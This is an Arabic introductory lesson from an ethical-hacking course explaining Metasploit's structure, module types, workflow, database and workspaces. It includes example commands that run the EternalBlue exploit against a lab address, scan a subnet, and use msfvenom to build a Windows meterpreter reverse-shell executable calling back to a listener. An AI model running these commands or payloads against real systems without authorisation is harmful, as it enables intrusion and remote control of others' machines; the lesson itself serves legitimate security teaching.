بنية Metasploit
الوحدات ووحدة التحكم
بنية Metasploit درس مجاني في Ethical Hacking Academy على CoddyKit. هذا هو الدرس 1 من أصل 4. يمكنك قراءة الدرس كاملاً أدناه مجاناً — ثم تمرن عليه مباشرة في المتصفح باستخدام محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7. هذا الدرس جزء من مسار التعلم في Ethical Hacking Academy، وتقدمك يتزامن عبر الويب وتطبيق CoddyKit. تتضمن دورة Ethical Hacking Academy 4 دروس في المجموع.
ما هو Metasploit؟
يُعد Metasploit إطار الاستغلال الأكثر استخدامًا على نطاق واسع. فهو يوفر مكتبة منظمة من عمليات الاستغلال وعمليات الحمولة والأدوات لاختبار الثغرات الأمنية وعرضها أثناء العمليات المصرّح بها.
وبدلًا من كتابة كل هجوم من الصفر، يمكنكم تحميل الوحدات المجرّبة وتهيئتها وتشغيلها عبر واجهة موحّدة.
msfconsole
الواجهة الأساسية هي msfconsole، وهي صدفة تفاعلية لسطر الأوامر. وتوفر إكمال الأوامر بعلامة التبويب، وسجل الأوامر، والوصول إلى كل وحدة.
يمكنكم تشغيلها من الطرفية، ثم إجراء العمل بالكامل داخل موجهها.
msfconsole
# msf6 > helpأنواع الوحدات
ينظم Metasploit إمكاناته ضمن أنواع الوحدات:
- exploit: شيفرة تستغل ثغرة أمنية.
- payload: شيفرة تعمل على الهدف بعد الاستغلال.
- auxiliary: أدوات الفحص والتشويش وغيرها من الأدوات التي لا توصل حمولة.
- post: إجراءات ما بعد الاستغلال على مضيف مخترق.
- encoder وnop: يساعدان الحمولات على تفادي الاكتشاف.
تسمية الوحدات
تستخدم الوحدات مسارًا هرميًا يوضح بالضبط ما تفعله. وتكشف قراءة المسار عن النوع والمنصة والخدمة المستهدفة.
exploit/windows/smb/ms17_010_eternalblue
# type / platform / service / specific exploitعمليات الاستغلال مقابل الحمولات
هناك تمييز مهم:
- إن exploit هو وسيلة الدخول؛ إذ يكسر البرنامج الضعيف.
- أما payload فهو ما تريدون حدوثه بعد الدخول، مثل فتح صدفة.
يمكنكم الجمع بينهما: إذ يستطيع exploit واحد توصيل حمولات مختلفة عديدة، تبعًا لهدفكم والهدف المستهدف.
سير عمل الوحدة
يتبع العمل مع أي وحدة دورة قابلة للتكرار:
- استخدموا search للبحث عن وحدة.
- استخدموا use لتحميلها.
- عيّنوا options مثل RHOSTS وLHOST.
- استخدموا run أو exploit لتشغيلها.
هذا الاتساق هو سبب قدرة الإطار على التوسع عبر آلاف الوحدات.
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.10.10.5
exploitمخزن البيانات والخيارات
توجد إعدادات الوحدة في datastore. وقد يكون كل خيار مطلوبًا أو اختياريًا.
- RHOSTS: عناوين الهدف البعيد.
- RPORT: المنفذ البعيد.
- LHOST: عنوان الاستماع الخاص بكم للاتصالات العكسية.
- LPORT: منفذ الاستماع الخاص بكم.
استخدموا show options لمعرفة ما تحتاج إليه الوحدة قبل تشغيلها.
قاعدة البيانات
يتكامل Metasploit مع قاعدة بيانات PostgreSQL لتخزين المضيفين والخدمات والغنائم وبيانات الاعتماد التي يتم اكتشافها أثناء العملية. ويتيح لكم ذلك تتبع نطاق كبير بكفاءة.
شغّلوها قبل تشغيل وحدة التحكم حتى تُسجّل النتائج تلقائيًا.
msfdb init
# Inside msfconsole:
# db_status hosts services credsالوحدات المساعدة
تنفذ وحدات Auxiliary أعمالًا مفيدة من دون استغلال: فحص المنافذ، وحصر الخدمات، والتخمين القسري لبيانات تسجيل الدخول، واختبار التشويش.
وغالبًا ما تكون خطوتكم الأولى، إذ تجمع المعلومات اللازمة قبل اختيار عملية استغلال.
use auxiliary/scanner/smb/smb_version
set RHOSTS 10.10.10.0/24
runmsfvenom
إن msfvenom أداة مرافقة لإنشاء حمولات مستقلة على شكل ملفات: ملفات تنفيذية أو نصوص برمجية أو shellcode يتم توصيلها خارج وحدة التحكم.
وهي تجمع بين إنشاء الحمولات وترميزها في أمر واحد، ما يجعلها مفيدة لمحاكاة التصيد الاحتيالي أو التوصيل المخصص في الاختبارات المصرّح بها.
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=10.10.14.2 LPORT=4444 -f exe -o shell.exeمساحات العمل
بالنسبة إلى العمليات المتعددة، تحافظ workspaces في Metasploit على عزل مضيفي كل عميل وخدماته وغنائمه داخل قاعدة البيانات. ويمكنكم التبديل بينها حتى لا تتسرب البيانات بين التقييمات.
workspace -a clientA # add a workspace
workspace clientA # switch to it
workspace # list allتحقق سريع
اختبروا مدى استيعابكم لأنواع الوحدات.
مراجعة
تعلّمتم بنية Metasploit:
- إن msfconsole هي الواجهة الرئيسية؛ بينما تنشئ msfvenom حمولات مستقلة.
- أنواع الوحدات: exploit, payload, auxiliary, post, encoder/nop.
- تشفّر مسارات الوحدات النوع والمنصة والخدمة.
- سير العمل: search, use, set options, run؛ وتوجد الإعدادات في datastore.
- تتتبع قاعدة بيانات PostgreSQL المضيفين والخدمات والغنائم.
التالي: البحث عن عمليات الاستغلال واستخدامها بفعالية.
الأسئلة الشائعة
هل درس «بنية Metasploit» مجاني؟
نعم — نص درس «بنية Metasploit» كامل متاح مجاناً هنا على الويب. لتمرينه بشكل تفاعلي (محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7) وفتح باقي دورة Ethical Hacking Academy، انتقل إلى CoddyKit PRO. تتضمن دورة Ethical Hacking Academy 4 دروس في المجموع.
ماذا ستتعلم في «بنية Metasploit»؟
الوحدات ووحدة التحكم تتمرن على Ethical Hacking Academy مع أكواد عملية تشغلها مباشرة في المتصفح، ومدرس ذكاء اصطناعي متاح 24/7 يجيب على أسئلتك أثناء عملك.
هل أحتاج إلى خبرة سابقة لأبدأ Ethical Hacking Academy؟
لا تُشترط خبرة سابقة. Ethical Hacking Academy على CoddyKit منظم للمبتدئين حتى المتقدمين، لذا يمكنك البدء من هنا أو من البداية والتقدم بسرعتك الخاصة. هذا هو الدرس 1 من أصل 4.
كم من الوقت يستغرق درس «بنية Metasploit»؟
معظم دروس CoddyKit تستغرق حوالي 5–10 دقائق. كل منها موجز وتفاعلي، لذا تحرز تقدماً مستمراً وتستأنف من حيث توقفت عبر الويب والتطبيق.
هل يمكنني كتابة وتشغيل أكواد في درس Ethical Hacking Academy هذا؟
نعم. كل درس في Ethical Hacking Academy يتضمن محرر أكواد مدمج، لذا تكتب وتشغل أكواداً حقيقية مباشرة في متصفحك وتحصل على تعليقات فورية من الذكاء الاصطناعي — بدون إعداد محلي.